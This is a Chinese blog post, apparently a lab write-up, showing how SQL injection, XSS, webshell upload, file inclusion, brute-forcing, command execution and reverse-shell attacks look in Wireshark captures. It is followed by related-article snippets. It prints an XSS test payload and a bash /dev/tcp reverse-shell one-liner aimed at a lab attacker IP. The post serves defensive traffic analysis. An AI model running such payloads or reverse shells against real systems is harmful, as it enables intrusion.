Web漏洞攻击的流量特征

已于 2023-12-09 17:58:45 修改
阅读量136 收藏 2
点赞数
文章标签: web安全
于 2023-12-08 17:29:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79441074/article/details/134882862
版权

环境:

        流量分析工具:Wireshark

        靶机ip:10.4.7.130

        攻击机IP:10.4.7.138

流量分析

SQL注入

 使用order by判断列数

wireshark抓包     

order by 15成功,order by 16失败,说明列数为15 选择追踪流    

抓到关键字order by 16

XSS

搜索框输入

<script>alert(1)</script>

出现弹窗

WireShark抓包,抓到关键字script alert

文件上传

上传一句话木马文件

WireShark抓包

文件包含

访问phpinfo文件WireShark抓包

密码爆破

bp抓包

bp密码爆破

WireShark流量分析

发现大量登陆信息

命令执行

攻击机

 WireShark抓包

反弹shell

kali 监听

Centos 7输入反弹shell指令

bash -i >& /dev/tcp/10.4.7.138/8888 0>&1

在kali中可以看到反弹shell到了Centos 7输入反弹shell的路径下

在wireshark中看到 追踪流看到反弹shell的路径kali中输入 ls ,再次追踪流,查看到命令

HSY233233
关注
Wireshark 分析常见 Web 攻击流量特征
weixin_51559599的博客
12-08 5637
攻击者在输入字段中插入恶意的 SQL 语句,实现对数据库的增删改查。可以在 http 请求中通过查找 SQL 注入语句中的 union、select、sleep 等关键字来判断 SQL 注入的流量dvwa SQL Injection low 为例poc筛选目的 ip 为靶场服务器并且为 http 的流量找到 SQL 请求的 http 报文可以看到unionselectdatabase等 SQL 注入的关键字解码后即可看到原始 poc。
常见web漏洞流量分析
一个努力学习网安的小牛马
12-10 960
【代码】常见web漏洞流量分析。
基础漏洞流量分析
m0_63842243的博客
12-11 1191
程序开发人员通常会把可重复使用函数或语句写到单个文件中,形成“封装”。在使用某个功能的时候,直接调用此文件,无需再次编写,提高代码重用性,减少代码量。这种调用文件的过程通常称为包含。程序开发人员都希望代码更加灵活,所以会把被包含的文件的路径设置为变量,来进行动态调用(包含),但正是由于这种灵活性,如果被包含文件的路径客户端可控,造成任意文件包含漏洞。几乎所有的脚本都会提供文件包含的功能,文件包含漏洞在 PHP 的Web 应用中居多,在JSP/ASP/ASPNET 程序中比较少。
通过wireshark判断web漏洞流量特征
m0_60870041的博客
12-09 922
学会使用wireshark分析web漏洞流量特征
笔记:常见中间件漏洞
02-16 2414
笔记:常见中间件漏洞
文件上传漏洞详解
热门推荐
金色%夕阳的博客
08-14 1万+
文件上传漏洞详解 什么是文件上传 什么是文件上传漏洞 文件上传漏洞的原理 文件上传漏洞需满足的条件 文件上传漏洞产生的原因 上传漏洞绕过 1.客服端绕过 2.服务端绕过 3.白名单绕过 文件上传的防御方式 1.客户端(前端js检测) 2.服务端(后端PHP过滤)...
文件包含漏洞特征详解
有勇气的牛排博客
07-29 819
1 介绍 更多文章:有勇气的牛排 — 攻防 如果允许客户端用户输入控制动态包含在服务器端的文件,会导致恶意代码的执行及敏感信息泄露,主要包括本地文件包含和远程文件包含两种形式。 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接) 2 基础 常见的文件包
(菜刀,蚁剑,冰蝎,哥斯拉)流量特征分析总结
weixin_54603520的博客
05-15 4267
在红蓝攻防的过程中,webshell工具的流量特征分析一直时蓝队成员需要关注的重点。
web漏洞扫描流量数据包-part4
04-26
在网络安全领域,Web漏洞扫描是至关重要的一环,它可以帮助我们发现并修复网站存在的安全问题,防止恶意攻击。本文将深入探讨“web漏洞扫描流量数据包-part4”这一主题,主要涉及基于HTTPS的扫描技术和工具,如OWASP...
web安全技术-实验六、文件上传漏洞.doc
08-20
它包含各种常见的Web安全漏洞,如SQL注入、XSS攻击以及我们关注的文件上传漏洞,提供了一个实践和学习安全漏洞的平台。 3. **安全等级设置**:DVWA的安全等级分为多个级别,从"low"(低)到"impossible"(不可能)...
木马病毒原理及特征分析
12-05
对木马原理的分析,形象易懂,看过后会很有帮助
web漏洞概述
06-13
Web漏洞是网络安全领域的一大威胁,尤其对于依赖互联网的业务和服务来说。这些漏洞可能导致数据泄露、系统瘫痪甚至完全控制服务器。下面将详细讨论标题和描述中提到的几个关键的Web漏洞类型及其防范方法。 首先,...
基于TF-IDF和随机森林算法的Web攻击流量检测方法研究.pdf
09-09
Web攻击流量检测中,TF-IDF可以用来识别和区分正常流量与恶意流量特征。通过计算HTTP请求中的关键词频率及其在整个数据集中出现的逆文档频率,我们可以找出可能的攻击特征,如异常请求频率、特定的URL路径或者...
hw蓝队初级面试总结_weblogic反序列化流量特征
2401_84253089的博客
04-28 716
使用@type的value字段执行反序列化的类,例如JdbcRowSetImpl这个类,接着将这个类中的成员变量datasourcename的value值设为rmi远程加载类,这样fastjson在将传入的类反序列化、实例对象后,会通过成员变量传入的value值,请求rmi服务器,最后rmi返回远程类,fastjson执行这个远程恶意类。3、修改/etc/profile的文件,在尾部添加相应显示间、日期、ip、命令脚本代码,这样输入history命令就会详细显示攻击者 ip、时间历史命令等;
WireShark流量分析(任意文件上传)
oJiuJieZhong的博客
02-12 3706
首先查看整个流量包,发现基本上为TCP和HTTP的流量数据(帧)。 还是老套路,网络攻击一般都是通过web来实现,那就先从http开始筛选。 由下图可知,数据帧都是在做一个正常的网页图片的GET请求,有一些少量的POST请求,那下一步再次筛选POST请求。 这下结果显而易见了,大部分POST请求都在访问一个html文件,而唯独有一个数据帧在对upload文件夹进行上传 点开该数据帧,发现这个一个任意文件上传的漏洞,通过修改content-type来实现绕过,并且攻击者通过漏洞上传了一个一句话木马。
菜刀,蚁剑,冰蝎,哥斯拉流量特征
2301_76786857的博客
12-24 2511
菜刀,蚁剑,冰蝎,哥斯拉四大webshell工具的流量特征
ARP渗透与攻防(三)之流量分析
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-23 3185
ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。ARP攻击主要是存在于局域网网络中,局域网中若有一台计算机感染ARP木马,则感染该ARP木马的系统将会试图通过“ARP欺骗”手段截获所在网络内其它计算机的通信信息,并因此造成网内其它计算机的通信故障。
webshell使用与流量分析(含数据包)
hackzkaq的博客
04-29 4132
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员-逍遥子 一、菜刀 1.使用方法 菜刀的使用简单,将一句话木马上传到目标,然后直接使用菜刀连接即可,菜刀主要可以对目标进行虚拟终端,文件操作,数据库操作等。 2.流量分析 1.当菜刀和服务器连接后:最开的的两次流量通信,便产生了大量的数据信息。且使用了base64的方式进行编码 2.对数据解码,发现第一的数据是获取设备的信息,第二段数据是写入了一段新的木马,对第二段的base64编码进行转码整理后得到; @ini_set("displa
网络安全(黑客技术)2024年三个月自学手册
最新发布
2401_85026116的博客
09-14 2315
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值